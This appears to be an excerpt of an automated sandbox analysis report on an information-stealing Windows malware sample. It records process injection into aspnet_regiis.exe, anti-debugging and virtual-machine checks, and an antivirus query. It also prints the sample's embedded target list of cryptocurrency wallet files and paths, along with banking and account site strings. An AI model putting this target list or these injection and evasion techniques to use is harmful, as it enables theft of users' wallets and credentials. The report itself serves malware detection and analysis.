                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_00415FD1 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,3_2_00415FD1
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_0040B93F FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,3_2_0040B93F
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_00415B0B GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcatA,lstrcatA,lstrlenA,lstrlenA,3_2_00415B0B
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_0040CD37 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,DeleteFileA,CopyFileA,FindNextFileA,FindClose,3_2_0040CD37
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_00415142 GetLogicalDriveStringsA,_memset,GetDriveTypeA,lstrcpyA,lstrcpyA,lstrcpyA,lstrlenA,3_2_00415142
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_00410FBA GetSystemInfo,wsprintfA,3_2_00410FBA
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\
                          Source: Amcache.hve.3.drBinary or memory string: VMware
                          Source: FHCGHJ.3.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696492231n
                          Source: FHCGHJ.3.drBinary or memory string: Canara Transaction PasswordVMware20,11696492231}
                          Source: FHCGHJ.3.drBinary or memory string: netportal.hdfcbank.comVMware20,11696492231
                          Source: FHCGHJ.3.drBinary or memory string: outlook.office.comVMware20,11696492231s
                          Source: FHCGHJ.3.drBinary or memory string: AMC password management pageVMware20,11696492231
                          Source: Amcache.hve.3.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                          Source: FHCGHJ.3.drBinary or memory string: interactivebrokers.comVMware20,11696492231
                          Source: FHCGHJ.3.drBinary or memory string: microsoft.visualstudio.comVMware20,11696492231x
                          Source: aspnet_regiis.exe, 00000003.00000002.2579771123.0000000003108000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2579771123.0000000003167000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                          Source: FHCGHJ.3.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696492231^
                          Source: FHCGHJ.3.drBinary or memory string: outlook.office365.comVMware20,11696492231t
                          Source: Amcache.hve.3.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
                          Source: FHCGHJ.3.drBinary or memory string: discord.comVMware20,11696492231f
                          Source: Amcache.hve.3.drBinary or memory string: vmci.sys
                          Source: FHCGHJ.3.drBinary or memory string: global block list test formVMware20,11696492231
                          Source: FHCGHJ.3.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696492231~
                          Source: FHCGHJ.3.drBinary or memory string: bankofamerica.comVMware20,11696492231x
                          Source: FHCGHJ.3.drBinary or memory string: tasks.office.comVMware20,11696492231o
                          Source: Amcache.hve.3.drBinary or memory string: VMware20,1
                          Source: Amcache.hve.3.drBinary or memory string: Microsoft Hyper-V Generation Counter
                          Source: Amcache.hve.3.drBinary or memory string: NECVMWar VMware SATA CD00
                          Source: Amcache.hve.3.drBinary or memory string: VMware Virtual disk SCSI Disk Device
                          Source: aspnet_regiis.exe, 00000003.00000002.2579771123.0000000003108000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
                          Source: FHCGHJ.3.drBinary or memory string: account.microsoft.com/profileVMware20,11696492231u
                          Source: Amcache.hve.3.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                          Source: Amcache.hve.3.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
                          Source: Amcache.hve.3.drBinary or memory string: VMware PCI VMCI Bus Device
                          Source: FHCGHJ.3.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696492231
                          Source: Amcache.hve.3.drBinary or memory string: VMware VMCI Bus Device
                          Source: Amcache.hve.3.drBinary or memory string: VMware Virtual RAM
                          Source: Amcache.hve.3.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                          Source: FHCGHJ.3.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696492231
                          Source: Amcache.hve.3.drBinary or memory string: VMware-42 27 88 19 56 cc 59 1a-97 79 fb 8c bf a1 e2 9d
                          Source: FHCGHJ.3.drBinary or memory string: turbotax.intuit.comVMware20,11696492231t
                          Source: FHCGHJ.3.drBinary or memory string: Canara Transaction PasswordVMware20,11696492231x
                          Source: FHCGHJ.3.drBinary or memory string: Interactive Brokers - HKVMware20,11696492231]
                          Source: Amcache.hve.3.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
                          Source: FHCGHJ.3.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696492231p
                          Source: Amcache.hve.3.drBinary or memory string: VMware Virtual USB Mouse
                          Source: FHCGHJ.3.drBinary or memory string: interactivebrokers.co.inVMware20,11696492231d
                          Source: Amcache.hve.3.drBinary or memory string: vmci.syshbin
                          Source: Amcache.hve.3.drBinary or memory string: VMware, Inc.
                          Source: Amcache.hve.3.drBinary or memory string: VMware20,1hbin@
                          Source: Amcache.hve.3.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
                          Source: FHCGHJ.3.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696492231
                          Source: Amcache.hve.3.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
                          Source: Amcache.hve.3.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                          Source: FHCGHJ.3.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696492231
                          Source: FHCGHJ.3.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696492231
                          Source: FHCGHJ.3.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696492231z
                          Source: Amcache.hve.3.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
                          Source: Amcache.hve.3.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                          Source: aspnet_regiis.exe, 00000003.00000002.2579771123.0000000003242000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                          Source: FHCGHJ.3.drBinary or memory string: dev.azure.comVMware20,11696492231j
                          Source: FHCGHJ.3.drBinary or memory string: www.interactivebrokers.comVMware20,11696492231}
                          Source: Amcache.hve.3.drBinary or memory string: vmci.syshbin`
                          Source: Amcache.hve.3.drBinary or memory string: \driver\vmci,\driver\pci
                          Source: FHCGHJ.3.drBinary or memory string: trackpan.utiitsl.comVMware20,11696492231h
                          Source: Amcache.hve.3.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                          Source: Amcache.hve.3.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                          Source: FHCGHJ.3.drBinary or memory string: ms.portal.azure.comVMware20,11696492231
                          Source: FHCGHJ.3.drBinary or memory string: secure.bankofamerica.comVMware20,11696492231|UE
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe, API call chain: ExitProcess graph end node, graph_3-72747
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe, API call chain: ExitProcess graph end node, graph_3-72763
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe, API call chain: ExitProcess graph end node, graph_3-74087
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe, Process information queried: ProcessInformation
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6D760D6C IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_6D760D6C
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe, Code function: 3_2_004014AD mov eax, dword ptr fs:[00000030h] 3_2_004014AD
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe, Code function: 3_2_0040148A mov eax, dword ptr fs:[00000030h] 3_2_0040148A
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe, Code function: 3_2_004014A2 mov eax, dword ptr fs:[00000030h] 3_2_004014A2
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe, Code function: 3_2_00418599 mov eax, dword ptr fs:[00000030h] 3_2_00418599
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe, Code function: 3_2_0041859A mov eax, dword ptr fs:[00000030h] 3_2_0041859A
                          Source: C:\Users\user\Desktop\file.exe, Code function: 0_2_6D7643E0 GetProcessHeap,0_2_6D7643E0
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6D75CDD2 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_6D75CDD2
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6D75C8A7 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_6D75C8A7
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_0041D016 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_0041D016
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_0041D98C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_0041D98C
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_0042762E SetUnhandledExceptionFilter,3_2_0042762E
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6CC5B66C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_6CC5B66C
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6CC5B1F7 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_6CC5B1F7
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6CE0AC62 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_6CE0AC62
                          Source: C:\Users\user\Desktop\file.exe, Memory allocated: page read and write | page guard

                          HIPS / PFW / Operating System Protection Evasion

                          Source: Yara match, File source: Process Memory Space: file.exe PID: 7500, type: MEMORYSTR
                          Source: Yara match, File source: Process Memory Space: aspnet_regiis.exe PID: 7620, type: MEMORYSTR
                          Source: C:\Users\user\Desktop\file.exe, Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 400000 protect: page execute and read and write
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6D749EF0 GetGameData,GetConsoleWindow,ShowWindow,VirtualAlloc,CreateProcessW,Wow64GetThreadContext,VirtualAllocEx,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,ReadProcessMemory,WriteProcessMemory,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,CloseHandle,CloseHandle,GetConsoleWindow,ShowWindow,CreateProcessW,VirtualAllocEx,VirtualAllocEx,WriteProcessMemory,0_2_6D749EF0
                          Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 400000 value starts with: 4D5AJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_004124A8 __EH_prolog3_catch_GS,CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,3_2_004124A8
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_0041257F __EH_prolog3_catch_GS,CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,3_2_0041257F
                          Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 400000Jump to behavior
                          Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 401000Jump to behavior
                          Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 430000Jump to behavior
                          Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 43D000Jump to behavior
                          Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 670000Jump to behavior
                          Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 671000Jump to behavior
                          Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: BC3008Jump to behavior
                          Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe"Jump to behavior
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6D75CF98 cpuid 0_2_6D75CF98
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,3_2_00410DDB
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,3_2_0042B0CC
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,3_2_0042B1C1
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,InterlockedDecrement,InterlockedDecrement,InterlockedDecrement,_free,_free,3_2_00429A50
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: GetLocaleInfoW,_GetPrimaryLen,_strlen,3_2_0042B268
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,3_2_0042B2C3
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA,_memmove,_memmove,_memmove,InterlockedDecrement,_free,_free,_free,_free,_free,_free,_free,_free,_free,InterlockedDecrement,3_2_0042AB40
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__invoke_watson,GetLocaleInfoW,GetLocaleInfoW,__calloc_crt,GetLocaleInfoW,_free,GetLocaleInfoW,3_2_004253E3
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,3_2_0042B494
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: GetLocaleInfoW,GetLocaleInfoW,malloc,GetLocaleInfoW,WideCharToMultiByte,__freea,3_2_0042749C
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: EnumSystemLocalesA,3_2_0042B556
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,_free,_free,_free,InterlockedDecrement,InterlockedDecrement,_free,_free,3_2_00429D6E
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: GetLocaleInfoA,_LocaleUpdate::_LocaleUpdate,___ascii_strnicmp,__tolower_l,__tolower_l,3_2_0042E56F
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,3_2_00427576
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,3_2_00428DC4
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,3_2_0042B5E7
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,3_2_0042B580
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itow_s,3_2_0042B623
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: GetLocaleInfoA,3_2_0042E6A4
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                          Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\Desktop\file.exe VolumeInformationJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeQueries volume information: C:\ VolumeInformationJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformationJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeQueries volume information: C:\Windows\Fonts\segoeuisl.ttf VolumeInformationJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeQueries volume information: C:\Windows\Fonts\seguisb.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6D75CA1B GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_6D75CA1B
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_00410C53 GetProcessHeap,HeapAlloc,GetUserNameA,3_2_00410C53
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_00410D2E GetProcessHeap,HeapAlloc,GetTimeZoneInformation,wsprintfA,3_2_00410D2E
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                          Source: Amcache.hve.3.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
                          Source: Amcache.hve.3.drBinary or memory string: msmpeng.exe
                          Source: Amcache.hve.3.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
                          Source: Amcache.hve.3.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
                          Source: aspnet_regiis.exe, 00000003.00000002.2579771123.0000000003108000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2579771123.000000000314A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                          Source: Amcache.hve.3.drBinary or memory string: MsMpEng.exe
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct

                          Stealing of Sensitive Information

                          Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                          Source: Yara matchFile source: 3.2.aspnet_regiis.exe.400000.0.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 3.2.aspnet_regiis.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.2.file.exe.6d771000.7.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.2.file.exe.6d771000.7.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.2.file.exe.6d740000.4.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000000.00000002.1358313297.000000006D771000.00000004.00000001.01000000.00000007.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000003.00000002.2579771123.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000003.00000002.2578673442.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: file.exe PID: 7500, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: aspnet_regiis.exe PID: 7620, type: MEMORYSTR
                          Source: aspnet_regiis.exe, 00000003.00000002.2578673442.000000000063A000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: ElectrumLTC
                          Source: aspnet_regiis.exe, 00000003.00000002.2578673442.000000000063A000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: \ElectronCash\wallets\
                          Source: aspnet_regiis.exe, 00000003.00000002.2579771123.00000000031A5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                          Source: aspnet_regiis.exe, 00000003.00000002.2578673442.000000000063A000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: window-state.json
